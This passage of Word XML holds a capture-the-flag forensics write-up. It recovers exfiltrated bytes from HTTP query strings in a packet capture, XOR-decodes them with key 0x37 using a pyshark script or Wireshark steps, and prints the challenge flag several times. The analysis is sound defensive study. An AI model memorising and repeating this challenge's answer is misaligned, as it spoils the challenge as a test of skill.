      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">The query string t=XX changes each time. This pattern looked like </w:t>
      </w:r>
      <w:r w:rsidRPr="0095727A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data being exfiltrated one byte at a time</w:t>
      </w:r>
      <w:r w:rsidRPr="0095727A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A48E388" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="00000000" w:rsidP="0095727A">
      <w:r>
        <w:pict w14:anchorId="221B4C19">
          <v:rect id="_x0000_i1070" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="494D9001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Step 3 – Extract the Bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9A47A9" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>By collecting all t=XX values from the GETs, we get:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBBFB4F" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>5e 54 43 51 4c 52 4f 43 52 59 44 5e 58 59 44 68</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A4C22A" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>5a 5e 50 5f 43 68 5d 42 44 43 68 44 42 54 5c 4a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B9B580" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:lastRenderedPageBreak/>
        <w:t>When converted from hex to ASCII, this yields:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3074CD3D" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>^TCQLROCRYD^XYDhZ^P_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>Ch]BDChDBT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>\J</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF2598E" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>Clearly not plaintext — looks encoded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B625F7F" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="00000000" w:rsidP="0095727A">
      <w:r>
        <w:pict w14:anchorId="0C431A2D">
          <v:rect id="_x0000_i1071" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F66CD8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Step 4 – Decoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BA6EEB" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">Since the traffic was exfiltrated one byte at a time, the simplest encoding is </w:t>
      </w:r>
      <w:r w:rsidRPr="0095727A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XOR with a single key</w:t>
      </w:r>
      <w:r w:rsidRPr="0095727A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0095727A">
        <w:br/>
        <w:t>Testing single-byte XOR keys, key 0x37 (decimal 55) works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223DD5AF" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>ictf{extensions_might_just_suck}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393B69C6" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="00000000" w:rsidP="0095727A">
      <w:r>
        <w:pict w14:anchorId="054FE194">
          <v:rect id="_x0000_i1072" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3755AA8B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Step 5 – The Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7C79A0" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>ictf{extensions_might_just_suck}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E52D4E0" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="00000000" w:rsidP="0095727A">
      <w:r>
        <w:pict w14:anchorId="648DAB34">
          <v:rect id="_x0000_i1073" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABD88FD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Automated Extraction (Python Script)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643D363D" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>Here’s a reproducible script that parses the PCAP with pyshark:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B56A452" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EA8F51" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7288F2BC" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>x-tension extractor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD50E1C" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>- Collects /?t=XX values from HTTP GET requests in the PCAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8B0CBC" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>- Reassembles them as bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3374437E" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>- XOR-decodes with key 0x37</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4DFF49" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61474412" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A"/>
    <w:p w14:paraId="060B5B5B" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>import sys, re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBC6C59" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A"/>
    <w:p w14:paraId="63959EAC" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>def xor_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>bytes(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>data, key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF50E90" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">    return </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>bytes(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>b ^ key for b in data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3CA199" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A"/>
    <w:p w14:paraId="5A104B03" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>main(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1AA987" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    if len(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>sys.argv</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>) &lt; 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE6680D" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>f"Usage: {</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>sys.argv</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>[0]} &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>file.pcapng</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>&gt;")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6532838D" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>sys.exit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEDA757" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A"/>
    <w:p w14:paraId="01399CC3" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">    pcap_path = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>sys.argv</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3F8463" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">    import pyshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C68F81" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A"/>
    <w:p w14:paraId="097BF60F" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">    cap = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>pyshark.FileCapture</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739B6364" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">        pcap_path,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B40F5E4" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">        display_filter='</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>http.request</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve"> and http.request.uri contains "t="'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7626061D" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC58205" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">    data = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5319BA7B" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">    for pkt in cap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D13D129" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4BC885" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">            uri = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>pkt.http</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>.request_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>uri  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve"> e.g. "/?t=5e"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225859C1" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">            m = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>re.search</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>(r"t=([0-9a-fA-F]{2})", uri)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327806DF" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">            if m:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AC76F9" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>data.append</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>(int(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>m.group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>(1), 16))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105CFFC2" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">        except Exception:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACC6C06" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">            continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F590502" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>cap.close</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45220DF8" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A"/>
    <w:p w14:paraId="467EC0D4" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">    raw = bytes(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B867C6" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>"[*] Raw bytes:", raw)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4871D9D7" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">    decoded = xor_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>bytes(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>raw, 0x37)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BEEED0" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">"[+] Decoded:", </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>decoded.decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DC7603" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A"/>
    <w:p w14:paraId="01A7F968" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2417B39F" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>main(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C52A503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Run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49912B02" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>pip install pyshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612BD5D3" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">python3 extract_xtension.py </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>chal.pcapng</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="69B6E148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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ED7AFF" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>[*] Raw bytes: b'^TCQLROCRYD^XYDhZ^P_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>Ch]BDChDBT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>\J'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C945B6E" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>[+] Decoded: ictf{extensions_might_just_suck}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42848026" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="00000000" w:rsidP="0095727A">
      <w:r>
        <w:pict w14:anchorId="29EDCBD3">
          <v:rect id="_x0000_i1074" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70350EF0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Manual Wireshark Method (No Python Needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8B04EC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>Open the PCAP in Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7648B5C3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>Apply the filter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E71E67C" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="0095727A">
        <w:t>http.request.uri contains "t="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A40B92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 xml:space="preserve">Right click → </w:t>
      </w:r>
      <w:r w:rsidRPr="0095727A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Copy → All Visible Packet Details as Text</w:t>
      </w:r>
      <w:r w:rsidRPr="0095727A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5CC8C9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>Extract just the hex values after t= (e.g. 5e 54 43 …).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548FC4AC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>Paste into a hex editor or CyberChef.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A78EBDA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 xml:space="preserve">Apply </w:t>
      </w:r>
      <w:r w:rsidRPr="0095727A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>From Hex → XOR with 0x37</w:t>
      </w:r>
      <w:r w:rsidRPr="0095727A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFCDD36" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0095727A">
        <w:t>The output reveals the flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBF6AB6" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="0095727A">
        <w:t>ictf{extensions_might_just_suck}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006D98F8" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="00000000" w:rsidP="0095727A">
      <w:r>
        <w:pict w14:anchorId="22B120A4">
          <v:rect id="_x0000_i1075" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07921533" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0095727A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Final Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A43F45D" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>ictf{extensions_might_just_suck}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0A6597" w14:textId="77777777" w:rsidR="0095727A" w:rsidRDefault="0095727A"/>
    <w:p w14:paraId="7B01CB54" w14:textId="77777777" w:rsidR="005F1502" w:rsidRDefault="005F1502"/>
    <w:p w14:paraId="1D527655" w14:textId="77777777" w:rsidR="005F1502" w:rsidRDefault="005F1502"/>
    <w:p w14:paraId="2DAC0A03" w14:textId="77777777" w:rsidR="005F1502" w:rsidRDefault="005F1502"/>
